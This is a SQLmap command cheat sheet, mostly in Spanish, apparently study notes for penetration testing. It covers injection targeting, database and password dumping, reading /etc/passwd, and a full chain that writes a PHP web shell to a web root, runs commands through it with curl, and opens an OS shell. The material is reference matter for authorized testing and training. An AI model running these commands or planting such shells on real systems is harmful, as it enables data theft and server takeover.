SQLmap

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

GET/POST Requests

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

 sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Full HTTP Requests

GET /?id=1 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0

sqlmap -r req.txt

Ver el menú de ayuda básica

sqlmap -h

Ver el menú de ayuda avanzada

sqlmap -hh

Ejecutar SQLMap sin pedir entrada al usuario

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Usar SQLMap con una solicitud POST

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Solicitud POST especificando un punto de inyección con un asterisco

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Pasar un archivo de solicitud HTTP a SQLMap

sqlmap -r req.txt

Especificar una cookie en el encabezado

sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Especificar una solicitud PUT

sqlmap -u www.target.com --data='id=1' --method PUT

Guardar el tráfico en un archivo de salida

sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

Especificar el nivel de verbosidad

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

Especificar un prefijo o sufijo

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

SELECT id,name,surname FROM users WHERE id LIKE (('test%')) UNION ALL SELECT 1,2,VERSION()-- -')) LIMIT 0,1

Especificar el nivel y el riesgo

sqlmap -u www.example.com/?id=1 -v 3 --level=5

Enumeración básica de la base de datos

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Enumeración de tablas

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Enumeración de tabla/fila

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Enumeración condicional

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Enumeración del esquema de la base de datos

sqlmap -u "http://www.example.com/?id=1" --schema

Búsqueda de datos

sqlmap -u "http://www.example.com/?id=1" --search -T user

Enumeración y descifrado de contraseñas

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Omitir el token CSRF

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Listar todos los scripts de manipulación

sqlmap --list-tampers

Verificar privilegios de DBA

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

Leer un archivo local

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Escribir un archivo

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Iniciar una shell de sistema operativo

sqlmap -u "http://www.example.com/?id=1" --os-shell

 sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Os Explotation

sqlmap -u "http://www.example.com/?id=1" --is-dba

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Web Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

curl http://www.example.com/shell.php?cmd=ls+-la